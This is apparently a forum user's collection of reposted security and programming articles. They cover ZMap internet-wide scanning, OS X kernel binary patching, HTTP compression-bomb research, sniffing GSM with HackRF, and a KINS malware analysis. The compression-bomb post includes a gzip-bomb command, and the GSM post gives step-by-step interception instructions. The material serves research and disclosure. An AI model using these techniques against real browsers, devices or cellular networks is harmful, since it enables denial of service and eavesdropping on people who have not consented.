Everything posted by Nytro

  1. ZMap The Internet Scanner v1.0.3 released ZMap is an open-source network scanner that enables researchers to easily perform Internet-wide network studies. With a single machine and a well provisioned network uplink, ZMap is capable of performing a complete scan of the IPv4 address space in under 45 minutes, approaching the theoretical limit of gigabit Ethernet. ZMap can be used to study protocol adoption over time, monitor service availability, and help us better understand large systems distributed across the Internet. ZMap is designed to perform comprehensive scans of the IPv4 address space or large portions of it. While ZMap is a powerful tool for researchers, please keep in mind that by running ZMap, you are potentially scanning the ENTIRE IPv4 address space at over 1.4 million packets per second. Before performing even small scans, we encourage users to contact their local network administrators and consult our list of scanning best practices. By default, ZMap will perform a TCP SYN scan on the specified port at the maximum rate possible. A more conservative configuration that will scan 10,000 random addresses on port 80 at a maximum 10 Mbps can be run as follows: $ zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.txt Download: https://zmap.io/download.html
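As a sanity check on the quoted numbers, the rate and scan time follow from simple arithmetic. The sketch below is illustrative, not ZMap's code; the 84-byte figure is an assumption (a minimum-size 64-byte Ethernet frame including FCS, plus 20 bytes of preamble and inter-frame gap on the wire per SYN probe):

```python
# Back-of-the-envelope check of the "full IPv4 sweep at gigabit speed" claim.
WIRE_BYTES_PER_PROBE = 84        # assumed: minimal frame + preamble + gap
LINK_BPS = 1_000_000_000         # gigabit Ethernet

pps = LINK_BPS / (WIRE_BYTES_PER_PROBE * 8)   # probes per second at line rate
minutes = 2**32 / pps / 60                    # time to cover all IPv4 addresses
print(f"{pps / 1e6:.2f} Mpps, full IPv4 sweep in about {minutes:.0f} minutes")
```

With these assumptions the theoretical limit works out to roughly 1.5 million packets per second and a sweep in the neighborhood of the quoted figure; the advertised 1.4 million packets per second sits just under that line rate.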
  2. Hacking the OS X Kernel for Fun and Profiles Posted on Tuesday, August 13, 2013. My last post described how user-level CPU profilers work, and specifically how Google’s pprof profiler gathers its CPU profiles with the help of the operating system. The specific feature needed from the operating system is the profiling timer provided by setitimer(2) and the SIGPROF signals that it delivers. If the operating system’s implementation of that feature doesn’t work, then the profiler doesn’t work. This post looks at a common bug in Unix implementations of profiling signals and the fix for OS X, applied by editing the OS X kernel binary. If you haven’t read “How to Build a User-Level CPU Profiler,’’ you might want to start there. Unix and Signals and Threads My earlier post referred to profiling programs, without mention of processes or threads. Unix in general and SIGPROF in particular predate the idea of threads. SIGPROF originated in the 4.2BSD release of Berkeley Unix, published in 1983. In Unix at the time, a process was a single thread of execution. Threads did not come easily to Unix. Early implementations were slow and buggy and best avoided. Each of the popular Unix variants added thread support independently, with many shared mistakes. Even before we get to implementation, many of the original Unix APIs are incompatible with the idea of threads. Multithreaded processes allow multiple threads of execution in a single process address space. Unix maintains much per-process state, and the kernel authors must decide whether each piece of state should remain per-process or change to be per-thread. For example, the single process stack must be split into per-thread stacks: it is impossible for independently executing threads to be running on a single stack. Because there are many threads, thread stacks tend to be smaller than the one big process stack that non-threaded Unix programs had. 
As a result, it can be important to define a separate stack for running signal handlers. That setting is per-thread, for the same reason that ordinary stacks are per-thread. But the choice of handler is per-process. File descriptors are per-process, but then one thread might open a file moments before another thread forks and execs a new program. In order for the open file not to be inherited by the new program, we must introduce a new variant of open(2) that can open a file descriptor atomically marked “close on exec.’’ And not just open: every system call that creates a new file descriptor needs a variant that creates the file descriptor “close on exec.’’ Memory is per-process, so malloc must use a lock to serialize access by independent threads. But again, one thread might acquire the malloc lock moments before another thread forks and execs a new program. The fork makes a new copy of the current process memory, including the locked malloc lock, and that copy will never see the unlock by the thread in the original program. So the child of fork can no longer use malloc without occasional deadlocks. That’s just the tip of the iceberg. There are a lot of changes to make, and it’s easy to miss one. Profiling Signals Here’s a thread-related change that is easy to miss. The goal of the profiling signal is to enable user-level profiling. The signal is sent in response to a program using up a certain amount of CPU time. More specifically, in a multithreaded kernel, the profiling signal is sent when the hardware timer interrupts a thread and the timer interrupt handler finds that the execution of that thread has caused the thread’s process’s profiling timer to expire. In order to profile the code whose execution triggered the timer, the profiling signal must be sent to the thread that is running. 
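The user-space half of this machinery is easy to poke at. Here is a minimal sketch in Python, which exposes setitimer(2) and SIGPROF through its signal module; it only demonstrates the profiling timer firing in a single-threaded process, not the multithreaded delivery question, and the 10ms interval is illustrative:

```python
import signal
import time

fired = {"count": 0}

def on_sigprof(signum, frame):
    # Runs each time the process's ITIMER_PROF timer expires, i.e.
    # after the process has consumed another slice of CPU time.
    fired["count"] += 1

signal.signal(signal.SIGPROF, on_sigprof)
signal.setitimer(signal.ITIMER_PROF, 0.01, 0.01)   # 10ms profiling interval

x = 0
deadline = time.monotonic() + 10.0       # safety stop only
while fired["count"] < 5 and time.monotonic() < deadline:
    x += 1                               # burn CPU so the PROF timer advances

signal.setitimer(signal.ITIMER_PROF, 0, 0)         # disarm the timer
print("received", fired["count"], "SIGPROF signals")
```

Because ITIMER_PROF counts CPU time rather than wall-clock time, the signals only arrive while the loop is actually executing; a sleeping process would never see them.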
If the signal is sent to a thread that is not running, the profile will record idleness such as being blocked on I/O or sleeping as execution and will be neither accurate nor useful. Modern Unix kernels support sending a signal to a process, in which case it can be delivered to an arbitrary thread, or to a specific thread. kill(2) sends a signal to a process, and pthread_kill(2) sends a signal to a specific thread within a process. Before Unix had threads, the code that delivered a profiling signal looked like psignal(p, SIGPROF), where psignal is a clearer name for the implementation of the kill(2) system call and p is the process with the timer that just expired. If there is just one thread per process, delivering the signal to the process cannot possibly deliver it to the wrong thread. In multithreaded programs, the SIGPROF must be delivered to the running thread: the kernel must call the internal equivalent of pthread_kill(2), not kill(2). FreeBSD and Linux deliver profiling signals correctly. Empirically, NetBSD, OpenBSD, and OS X do not. (Here is a simple C test program.) Without correct delivery of profiling signals, it is impossible to build a correct profiler.

OS X Signal Delivery

To Apple’s credit, the OS X kernel sources are published and open source, so we can look more closely at the buggy OS X implementation. The profiling signals are delivered by the function bsd_ast in the file kern_sig.c. Here is the relevant bit of code:

void
bsd_ast(thread_t thread)
{
    proc_t p = current_proc();
    ...
    if (timerisset(&p->p_vtimer_prof.it_value)) {
        uint32_t microsecs;
        task_vtimer_update(p->task, TASK_VTIMER_PROF, &microsecs);
        if (!itimerdecr(p, &p->p_vtimer_prof, microsecs)) {
            if (timerisset(&p->p_vtimer_prof.it_value))
                task_vtimer_set(p->task, TASK_VTIMER_PROF);
            else
                task_vtimer_clear(p->task, TASK_VTIMER_PROF);
            psignal(p, SIGPROF);
        }
    }
    ...
}

The bsd_ast function is the BSD half of the OS X timer interrupt handler.
If profiling is enabled, bsd_ast decrements the timer and sends the signal if the timer expires. The innermost if statement is resetting the timer state, because setitimer(2) allows both one-shot and periodic timers. As predicted, the code is sending the profiling signal to the process, not to the current thread. There is a function psignal_uthread defined in the same source file that sends a signal instead to a specific thread. One possible fix is very simple: change psignal to psignal_uthread. I filed a report about this bug as Apple Bug Report #9177434 in March 2011, but the bug has persisted in subsequent releases of OS X. In my report, I suggested a different fix, inside the implementation of psignal, but changing psignal to psignal_uthread is even simpler. Let’s do that.

Patching the Kernel

It should be possible to rebuild the OS X kernel from the released sources. However, I do not know whether the sources are complete, and I do not know what configuration I need to use to recreate the kernel on my machine. I have no confidence that I’d end up with a kernel appropriate for my computer. Since the fix is so simple, it should be possible to just modify the standard OS X kernel binary directly. That binary lives in /mach_kernel on OS X computers. If we run gdb on /mach_kernel we can see the compiled machine code for bsd_ast and find the section we care about.
$ gdb /mach_kernel
(gdb) disas bsd_ast
Dump of assembler code for function bsd_ast:
0xffffff8000568a50 <bsd_ast+0>:   push   %rbp
0xffffff8000568a51 <bsd_ast+1>:   mov    %rsp,%rbp
...
if (timerisset(&p->p_vtimer_prof.it_value))
0xffffff8000568b7b <bsd_ast+299>: cmpq   $0x0,0x1e0(%r15)
0xffffff8000568b83 <bsd_ast+307>: jne    0xffffff8000568b8f <bsd_ast+319>
0xffffff8000568b85 <bsd_ast+309>: cmpl   $0x0,0x1e8(%r15)
0xffffff8000568b8d <bsd_ast+317>: je     0xffffff8000568b9f <bsd_ast+335>
task_vtimer_set(p->task, TASK_VTIMER_PROF);
0xffffff8000568b8f <bsd_ast+319>: mov    0x18(%r15),%rdi
0xffffff8000568b93 <bsd_ast+323>: mov    $0x2,%esi
0xffffff8000568b98 <bsd_ast+328>: callq  0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp    0xffffff8000568bad <bsd_ast+349>
task_vtimer_clear(p->task, TASK_VTIMER_PROF);
0xffffff8000568b9f <bsd_ast+335>: mov    0x18(%r15),%rdi
0xffffff8000568ba3 <bsd_ast+339>: mov    $0x2,%esi
0xffffff8000568ba8 <bsd_ast+344>: callq  0xffffff8000237660 <task_vtimer_clear>
psignal(p, SIGPROF);
0xffffff8000568bad <bsd_ast+349>: mov    %r15,%rdi
0xffffff8000568bb0 <bsd_ast+352>: xor    %esi,%esi
0xffffff8000568bb2 <bsd_ast+354>: xor    %edx,%edx
0xffffff8000568bb4 <bsd_ast+356>: xor    %ecx,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov    $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq  0xffffff8000567340 <threadsignal+224>
...

I’ve annotated the assembly with the corresponding C code. The final sequence is odd. It should be a call to psignal but instead it is a call to code 224 bytes beyond the start of the threadsignal function. What’s going on is that psignal is a thin wrapper around psignal_internal, and that wrapper has been inlined. Since psignal_internal is a static function, it does not appear in the kernel symbol table, and so gdb doesn’t know its name.
The definitions of psignal and psignal_uthread are:

void
psignal(proc_t p, int signum)
{
    psignal_internal(p, NULL, NULL, 0, signum);
}

static void
psignal_uthread(thread_t thread, int signum)
{
    psignal_internal(PROC_NULL, TASK_NULL, thread, PSIG_THREAD, signum);
}

With the constants expanded, the call we’re seeing is psignal_internal(p, 0, 0, 0, 0x1b) and the call we want to turn it into is psignal_internal(0, 0, thread, 4, 0x1b). All we need to do is prepare the different argument list. Unfortunately, the thread variable was passed to bsd_ast in a register, and since it is no longer needed where we are in the function, the register has been reused for other purposes: thread is gone. Fortunately, bsd_ast’s one and only invocation in the kernel is bsd_ast(current_thread()), so we can reconstruct the value by calling current_thread ourselves. Unfortunately, there is no room in the 15 bytes from bsd_ast+349 to bsd_ast+364 to insert such a call and still prepare the other arguments. Fortunately, we can optimize a bit of the preceding code to make room. Notice that the calls to task_vtimer_set and task_vtimer_clear are passing the same argument list, and that argument list is prepared in both sides of the conditional:
...
if (timerisset(&p->p_vtimer_prof.it_value))
0xffffff8000568b7b <bsd_ast+299>: cmpq   $0x0,0x1e0(%r15)
0xffffff8000568b83 <bsd_ast+307>: jne    0xffffff8000568b8f <bsd_ast+319>
0xffffff8000568b85 <bsd_ast+309>: cmpl   $0x0,0x1e8(%r15)
0xffffff8000568b8d <bsd_ast+317>: je     0xffffff8000568b9f <bsd_ast+335>
task_vtimer_set(p->task, TASK_VTIMER_PROF);
0xffffff8000568b8f <bsd_ast+319>: mov    0x18(%r15),%rdi
0xffffff8000568b93 <bsd_ast+323>: mov    $0x2,%esi
0xffffff8000568b98 <bsd_ast+328>: callq  0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp    0xffffff8000568bad <bsd_ast+349>
task_vtimer_clear(p->task, TASK_VTIMER_PROF);
0xffffff8000568b9f <bsd_ast+335>: mov    0x18(%r15),%rdi
0xffffff8000568ba3 <bsd_ast+339>: mov    $0x2,%esi
0xffffff8000568ba8 <bsd_ast+344>: callq  0xffffff8000237660 <task_vtimer_clear>
psignal(p, SIGPROF);
0xffffff8000568bad <bsd_ast+349>: mov    %r15,%rdi
0xffffff8000568bb0 <bsd_ast+352>: xor    %esi,%esi
0xffffff8000568bb2 <bsd_ast+354>: xor    %edx,%edx
0xffffff8000568bb4 <bsd_ast+356>: xor    %ecx,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov    $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq  0xffffff8000567340 <threadsignal+224>
...

We can pull that call setup above the conditional, eliminating one copy and giving ourselves nine bytes to use for delivering the signal. A call to current_thread would take five bytes, and then moving the result into an appropriate register would take two more, so nine is plenty. In fact, since we have nine bytes, we can inline the body of current_thread—a single nine-byte mov instruction—and change it to store the result to the correct register directly. That avoids needing to prepare a position-dependent call instruction. The final version is:
...
0xffffff8000568b7b <bsd_ast+299>: mov    0x18(%r15),%rdi
0xffffff8000568b7f <bsd_ast+303>: mov    $0x2,%esi
0xffffff8000568b84 <bsd_ast+308>: cmpq   $0x0,0x1e0(%r15)
0xffffff8000568b8c <bsd_ast+316>: jne    0xffffff8000568b98 <bsd_ast+328>
0xffffff8000568b8e <bsd_ast+318>: cmpl   $0x0,0x1e8(%r15)
0xffffff8000568b96 <bsd_ast+326>: je     0xffffff8000568b9f <bsd_ast+335>
0xffffff8000568b98 <bsd_ast+328>: callq  0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp    0xffffff8000568ba4 <bsd_ast+340>
0xffffff8000568b9f <bsd_ast+335>: callq  0xffffff8000237660 <task_vtimer_clear>
0xffffff8000568ba4 <bsd_ast+340>: xor    %edi,%edi
0xffffff8000568ba6 <bsd_ast+342>: xor    %esi,%esi
0xffffff8000568ba8 <bsd_ast+344>: mov    %gs:0x8,%rdx
0xffffff8000568bb1 <bsd_ast+353>: mov    $0x4,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov    $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq  0xffffff8000567340 <threadsignal+224>
...

If we hadn’t found the duplicate call setup to factor out, another possible approach would have been to factor the two very similar code blocks handling SIGVTALRM and SIGPROF into a single subroutine, sitting in the middle of the bsd_ast function code, and to call it twice. Removing the second copy of the code would leave plenty of space for the longer psignal_uthread call setup. The code we’ve been using is from OS X Mountain Lion, but all versions of OS X have this bug, and the relevant bits of bsd_ast haven’t changed from version to version, although the compiler and therefore the generated code do change. Even so, all have the basic pattern and all can be fixed with the same kind of rewrite.

Using the Patch

If you use the Go or the C++ gperftools and want accurate CPU profiles on OS X, I’ve packaged up the binary patcher as code.google.com/p/rsc/cmd/pprof_mac_fix. It can handle OS X Snow Leopard, Lion, and Mountain Lion. Will OS X Mavericks need a fix too? We’ll see.

Further Reading

Binary patching is an old, venerable technique. This is just a simple instance of it.
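The instance here reduces to a generic pattern: locate a unique byte sequence in the binary and overwrite it in place with a same-length replacement. A minimal Python sketch of that pattern follows; the byte strings are placeholders invented for illustration, not the real mach_kernel instruction sequences:

```python
# Generic find-and-patch sketch in the spirit of a binary patcher.
# OLD/NEW bytes below are placeholders, NOT the real kernel patch.
def patch(image: bytes, old: bytes, new: bytes) -> bytes:
    assert len(old) == len(new), "patch must not change code size"
    off = image.find(old)
    if off < 0:
        raise ValueError("expected byte sequence not found; wrong version?")
    if image.find(old, off + 1) != -1:
        raise ValueError("byte sequence not unique; refusing to patch")
    return image[:off] + new + image[off + len(new):]

kernel = b"\x90\x90" + b"\x48\x89\xfe\x31\xf6" + b"\x90\x90"   # toy image
patched = patch(kernel, b"\x48\x89\xfe\x31\xf6", b"\x31\xff\x31\xf6\x90")
print(patched.hex())
```

The uniqueness check matters: overwriting the wrong occurrence of a short instruction sequence in a real kernel image would corrupt unrelated code, so a careful patcher refuses to proceed unless the match is unambiguous.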
If you liked reading about this, you may also like to read Jeff Arnold’s paper “Ksplice: Automatic Rebootless Kernel Updates.’’ Ksplice can construct binary patches for Linux security vulnerabilities and apply them on the fly to a running system. Sursa: research!rsc: Hacking the OS X Kernel for Fun and Profiles
  3. Vulnerabilities that just won't die - Compression Bombs Recently Cyberis has reviewed a number of next-generation firewalls and content inspection devices - a subset of the test cases we developed related to compression bombs, specifically delivered over HTTP. The research prompted us to take another look at how modern browsers handle such content, given that the vulnerability (or perhaps more accurately, 'common weakness' - CWE-409: Improper Handling of Highly Compressed Data (Data Amplification)) has been reported and well known for over ten years. The results surprised us - in short, the majority of web browsers are still vulnerable to compression bombs leading to various denial-of-service conditions, including in some cases, full exhaustion of all available disk space with no user input.

Introduction to HTTP Compression

HTTP compression is a capability widely supported by web browsers and other HTTP User-Agents, allowing bandwidth and transmission speeds to be maximised between client and server. Supporting clients will advertise supported compression schemas, and if a mutually supported scheme can be negotiated, the server will respond with a compressed HTTP response. Compatible User-Agents will typically decompress encoded data on-the-fly. HTML content, images and other files transmitted are usually handled in memory (allowing pages to be rendered as quickly as possible), whilst larger file downloads will usually be decompressed straight to disk to prevent unnecessary consumption of memory resources on the client. Gzip (RFC1952) is considered the most widely supported compression schema in use today, although the common weaknesses discussed in this post are applicable to all such schemas.

What is a Compression Bomb?

Quite simply, a compression bomb is compressed content that extracts to a size much larger than the developer expected; in other words, incorrect handling of highly compressed data.
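The defensive side of "handling highly compressed data" is to bound how much output a decompressor may produce instead of trusting the stream. A hedged Python sketch of that pattern, building a small single-round gzip bomb in memory and rejecting it (the 1 MB cap is illustrative):

```python
import gzip
import zlib

# A 10 MB run of zeros compresses to a few KB in one round of gzip.
bomb = gzip.compress(b"\x00" * (10 * 1024 * 1024), compresslevel=9)

def inflate_capped(blob: bytes, limit: int):
    """Decompress at most `limit` bytes; reject streams that want more."""
    d = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)   # +16 => gzip framing
    out = d.decompress(blob, limit)                     # bounded output step
    if not d.eof:       # hit the cap (or truncation) before end-of-stream
        return None     # treat as a bomb and refuse it
    return out

LIMIT = 1 * 1024 * 1024   # 1 MB cap, illustrative
print("bomb size:", len(bomb), "rejected:", inflate_capped(bomb, LIMIT) is None)
```

A decompressor without such a cap inflates unchecked until memory or disk runs out, which is precisely the failure mode described next.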
This can result in various denial-of-service conditions, for example memory, CPU and free disk space exhaustion. Using an entropy rate of zero (for example, /dev/zero), coupled with multiple rounds of encoding that modern browsers support (see our ResponseCoder post), a 43 Kilobyte HTTP server response will equate to a 1 Terabyte file when decompressed by a receiving client - an effective compression ratio of 25,127,100:1. It is trivial to make a gzip bomb on the Linux command line - see below for an example of a 10MB file being compressed to just 159 bytes using two rounds of gzip compression:

$ dd if=/dev/zero bs=10M count=1 | gzip -9 | gzip -9 | wc -c
1+0 records in
1+0 records out
10485760 bytes (10 MB) copied, 0.149518 s, 70.1 MB/s
159

Testing Framework

Cyberis has released a testing framework, both for generic HTTP response tampering and various sizes of gzip bombs. GzipBloat (https://www.github.com/cyberisltd/GzipBloat) is a PHP script to deliver pre-compressed gzipped content to a browser, specifying the correct HTTP response headers for the number of encoding rounds used, and optionally a ‘Content-Disposition’ header. A more generic response tampering framework - ResponseCoder (https://www.github.com/cyberisltd/ResponseCoder) - allows more fine-grained control, although content is currently compressed on the fly - limiting its effectiveness when used to deliver HTTP compression bombs. Both tools are designed to assist you in testing both intermediary devices (content inspection/next-generation firewalls etc.) and browsers for compression bomb vulnerabilities. During our tests, we delivered compressed content in a variety of different forms, both as ‘file downloads’ and in-line ‘HTML content’. The exact tests we conducted and the results can be read in our more detailed paper on this topic here.

Is my Browser Vulnerable?
It is actually easier to name the browser that is not vulnerable - namely Opera - all other major desktop browsers (Internet Explorer, Firefox, Chrome, Safari) available today exhibited at least one denial-of-service condition during our tests. The most serious condition observed was an effective denial-of-service against Windows operating systems when a large gzip encoded file is returned with a ‘Content-Disposition’ header - no user interaction was required to exploit the vulnerability, and recovery from the condition required knowledge of the Temporary Internet Files directory structure and command line access. This seemed to affect all recent versions of IE, including IE11 on Windows 8.1 Preview. Our results demonstrated that the most popular web browsers in use today are vulnerable to various denial-of-service conditions - namely memory, CPU and free disk space consumption - by failing to consider the high compression ratios possible from data with an entropy rate of zero. Depending on the HTTP response headers used, vulnerable browsers will either decompress the content in memory, or directly to disk - only terminating when operating system resources are exhausted.

Conclusion

With the growth of mobile data connectivity, improvements in data compression for Internet communications have become highly desirable from a performance perspective, but extensions to these techniques outside of original protocol specifications can have unconsidered impacts for security. Although compression bombs have been a known threat for a number of years, the growing ubiquity of advanced content inspection devices, and the proliferation of User-Agents which handle compression mechanisms differently, have substantially changed the landscape for these types of attack. The attacks discussed here will provide an effective denial-of-service against a number of popular client browsers, but the impact in these cases is rather limited.
Ultimately, the greater impact of this style of attack is likely to be felt by intermediate content inspection devices with a large pool of users. It is possible a number of advanced content inspection devices may be susceptible to these decompression denial-of-service attacks themselves, potentially as the result of a single server-client response. In an environment with high availability requirements and a large pool of users, a denial-of-service attack which could be launched by a single malicious Internet server could have a devastating impact. Posted by Cyberis at 07:36 Sursa: Cyberis Blog: Vulnerabilities that just won't die - Compression Bombs
  4. [h=3]Sniffing GSM with HackRF[/h]by admin » Wed Aug 14, 2013 1:29 am I will open by saying: only sniff your own system or a system you have been given permission to work on. Sniffing a public network in your country may be illegal. I recently had a play with sniffing some GSM using the HackRF. The clock was a little unstable and drifted quite a bit, but in the end I was able to view lots of different system messages etc. I will assume you have a working Linux system with GNU Radio and HackRF running for this tutorial; if not, you can use the live CD which I referenced in the software section of the forum. It's a great tool and the HackRF works right out of the box. First thing to do is find out the frequency of a local GSM tower. For this I used gqrx, which is pre-loaded on the live CD; open it up and have a look around the 900MHz band and you should see something like the image below.

[image: gqrx.png]

You can see the non-hopping channel at 952MHz and another at 944.2MHz; write down the approximate frequency for the later step. Now we need to install Airprobe using the following commands:

git clone git://git.gnumonks.org/airprobe.git
cd airprobe/gsmdecode
./bootstrap
./configure
make
cd ../gsm-receiver
./bootstrap
./configure
make

That's all there is to it. We can now start receiving some GSM. First things first, start Wireshark with the following command:

sudo wireshark

Select "lo" as the capture device and enter gsmtap in the filter window like in the image below:

[image: wireshark.png]

Now go back to your terminal window and enter the following:

cd airprobe/gsm-receiver/src/python
./gsm_receive_rtl.py -s 2e6

A window will pop up and the first thing to do is uncheck auto gain and set the slider to full, then enter the GSM frequency you noted before as the center frequency.
Also select peak hold and average in the top window's trace options like so:

[image: spectrum.png]

You will see that only the signal on the right (blue line) consistently stays in place over the peak hold (green line), indicating that it is the non-hopping channel. All we need to do to start decoding is click on the center of that frequency hump in the top window. You may see some errors coming up, but that is OK; eventually it will start to capture data, something like this:

[image: data.png]

You can now see the GSM data popping up in Wireshark. As I said at the beginning, the HackRF clock does drift, so you will need to keep clicking to re-center the correct frequency, but all in all it works pretty well. As silly as it may sound, wrapping your HackRF in a towel or similar really helps the thermal stability of the clock and reduces drift. Now this "hack" is obviously not very useful on its own, but I think at least it helps to show the massive amount of potential there is in the HackRF. Sursa: BinaryRF.com • View topic - Sniffing GSM with HackRF
  5. Scanning the Internet in 45 Minutes by Dennis Fisher The Internet is a big thing. Or, more accurately, a big collection of things. Figuring out exactly how many things, and what vulnerabilities those things contain, has always been a challenge for researchers, but a new tool released by a group from the University of Michigan is capable of scanning the entire IPv4 address space in less than an hour. There have been a handful of Internet-wide scans done by various organizations over the years, but most of them have not had a security motivation. And they can take days or weeks, depending upon how the scan is done and what the researchers were trying to accomplish. But the new Zmap tool built by the Michigan researchers has the ability to perform an Internet-wide scan in about 45 minutes while running on an ordinary server. The tool, which the team presented at the USENIX Security conference last week, is open-source and freely available for other researchers to use. To demonstrate the capabilities of Zmap, the Michigan team, which comprises J. Alex Halderman, an assistant professor, and Eric Wustrow and Zakir Durumeric, both doctoral candidates, ran a scan of the entire IPv4 address space, returning results from more than 34 million hosts, or what they estimate to be about 98 percent of the machines in that space. Zmap is designed specifically to bypass some of the speed obstacles that have slowed down some of the previous large-scale scans of the Internet. The researchers removed some of the considerations for machines on the other end of the scan, for example assuming that they sit on well-provisioned networks and can handle fast probes. The result is that the tool can scan more than 1,300 times faster than the venerable Nmap scanner.
“While Nmap adapts its transmission rate to avoid saturating the source or target networks, we assume that the source network is well provisioned (unable to be saturated by the source host), and that the targets are randomly ordered and widely dispersed (so no distant network or path is likely to be saturated by the scan). Consequently, we attempt to send probes as quickly as the source’s NIC can support, skipping the TCP/IP stack and generating Ethernet frames directly. We show that ZMap can send probes at gigabit line speed from commodity hardware and entirely in user space,” the researchers say in their paper, “Zmap: Fast Internet-Wide Scanning and Its Security Implications”. “While Nmap maintains state for each connection to track which hosts have been scanned and to handle timeouts and retransmissions, ZMap forgoes any per-connection state. Since it is intended to target random samples of the address space, ZMap can avoid storing the addresses it has already scanned or needs to scan and instead selects addresses according to a random permutation generated by a cyclic multiplicative group.” That stateless scanning, the researchers said, allowed Zmap to get both faster response times and better coverage of the target address space. As for practical applications of the tool, the researchers already have found several. In the last year, the team ran 110 separate scans of the entire HTTPS infrastructure, finding a total of 42 million certificates. Interestingly, they only found 6.9 million certificates that were trusted by browsers. They also found two separate sets of mis-issued SSL certificates, something that’s been a serious problem in recent years. The Zmap team also wrote a custom probe to look for the UPnP vulnerability that HD Moore of Rapid 7 discovered in January. After scanning 15.7 million devices, they found that 3.3 million were still vulnerable. That bug can be exploited with a single packet. 
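The "random permutation generated by a cyclic multiplicative group" admits a very compact sketch: pick a prime P, choose a primitive root G of the multiplicative group mod P, and iterate x -> (x * G) mod P, which visits every nonzero residue exactly once before cycling. The values below are toy numbers so the full cycle is checkable; this is an illustrative reconstruction of the idea, not ZMap's actual implementation (which uses a prime just above 2^32):

```python
# Stateless address iteration via a cyclic multiplicative group, in the
# spirit of ZMap's design. P and G are toy values for illustration.
P = 251    # prime modulus; the group Z_P* has order P - 1 = 250
G = 6      # a primitive root mod 251, so powers of G cover the whole group

def cycle(start=1):
    x = start
    while True:
        yield x                 # "address" in 1..P-1, each exactly once
        x = (x * G) % P
        if x == start:          # the permutation has wrapped around
            return

visited = list(cycle())
print(len(visited), len(set(visited)))
```

Because the next address is a pure function of the current one, the scanner needs no per-target state at all: it just remembers the current value and the starting point, which is exactly the property the paper describes.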
“Given that these vulnerable devices can be infected with a single UDP packet [25], we note that these 3.4 million devices could have been infected in approximately the same length of time—much faster than network operators can reasonably respond or for patches to be applied to vulnerable hosts. Leveraging methodology similar to ZMap, it would only have taken a matter of hours from the time of disclosure to infect every publicly available vulnerable host,” the researchers say in the paper. Sursa: Scanning the Internet in 45 Minutes | Threatpost
  6. [h=1]Java tops C as most popular language in developer index[/h] [h=2]As Tiobe factors in more sites in its assessment, Java rises, while C and Objective-C drop in the rankings[/h] By Paul Krill | InfoWorld Java has retaken the lead in this month's Tiobe index of the most popular programming languages, which now assesses more search engines to calculate the numbers. The C language barely slipped to the second spot in the August rendition of the Tiobe Programming Community index. Java last held the lead in March. "C and Objective-C are the biggest victims of adding the 16 new search engines," with Objective-C dropping from third place last month to fourth place, Tiobe said. Winners are the Google Go language, which rose to the 26th ranking after being ranked 42nd; LabView, rising from 100 to 49; and Openedge ABL, moving from 129th to 57th. Tiobe gauges language popularity by assessing searches about languages made on popular sites like Google, Yahoo, Baidu, and Wikipedia. Specifically, Tiobe counts skilled engineers, courses, and third-party vendors pertinent to a language. Most of the new indexes are from the United States and China, with Japanese and Brazilian sites also added to the mix. Reddit and MyWeb are among the new sites being gauged. Still, the new sites count for only a small portion when calculating the ratings. "Yes, we added more search engines to improve the validity of the index," Tiobe Managing Director Paul Jansen said. "Another related reason is to make sure that there are less fluctuations in rankings." Tiobe's rankings have had their critics, including Andi Gutmans, CEO of PHP tools vendor Zend Technologies. And consistency among these indexes is now in question. Last month, Tiobe and the rival Pypl Popularity of Programming Language index both had decidedly different takes on the PHP language, with Tiobe saying it was making a comeback while Pypl said it was declining. 
For the month of August, Java turned up in 15.978 percent of Tiobe's searches, barely ahead of C, at 15.974 percent. Rounding out the top five were C++ (9.371 percent), Objective-C (8.082 percent), and PHP (6.694 percent). Pypl, which assesses just the volume of language tutorials searched in Google, also had Java tops (a 27.2 percent share of the index). It was followed by PHP (14.3 percent), C# (9.8 percent), Python (also 9.8 percent), and C++ (9.1 percent). This story, "Java tops C as most popular language in developer index," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Java tops C as most popular language in developer index | Java programming - InfoWorld
  7. KINS malware: initialization and DNA paternity test A new post about KINS, I don’t have anything interesting on my hands right now so I decided to go on with the analysis of it. This was my first idea, but someone (Thanks Michael) suggested to me something to add to the analysis. The idea comes from a simple question: is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’ll start looking at KINS with an eye to Zeus trying to understand if there are some similarities or not. Holidays are coming and I don’t have a lot of free time for a complete analysis of the entire malware, right now you have to be satisfied with just the ground of KINS and Zeus_leaked_source_code, the initialization part only. It’s generally an annoying job but from the ground you can understand a lot of information of the malware. Anyway, I’ll try to write something light and readable. Reference KINS malware: md5 = 7b5ac02e80029ac05f04fa5881a911b2 Reference Zeus leaked source code: version 2.0.8.9 Encrypted strings Strings are always a good starting point and like almost all the malwares out there every suspicious string has been crypted, most of the time a simple xor encryption would suffice. KINS doesn’t decrypt all the strings in a unique time, it decrypts a single string when it has to use it. Inside the .text section there’s an array of _STRINGINFO structures, each structure contains the necessary data about a single encrypted string: 00000000 _STRINGINFO struc ; (sizeof=0x8) 00000000 key db ? ; xor key used to decrypt the encoded string 00000001 db ? ; undefined ; unused because xor key is 1 byte only 00000002 size dw ? ; size of the string to decrypt 00000004 encodedString dd ? 
; string to decrypt
00000008 _STRINGINFO ends

When the malware needs a string it calls DecryptStringW, passing it the array index:

4231CA DecryptStringW proc near
4231CA movzx eax, ax ; Id of the string to decrypt
4231CD lea eax, STRINGINFO[eax*8] ; current _STRINGINFO identified by the index
4231D4 xor ecx, ecx
4231D6 xor edx, edx ; iterator index
4231D8 cmp cx, [eax+_STRINGINFO.size]
4231DC jnb short loc_423209
4231DE push ebx
4231DF push edi
4231E0 DecryptStringIterator:
4231E0 mov edi, [eax+_STRINGINFO.encodedString]
4231E3 movzx ebx, [eax+_STRINGINFO.key]
4231E6 movzx ecx, dx
4231E9 movsx di, byte ptr [edi+ecx]
4231EE xor di, bx ; xor with key
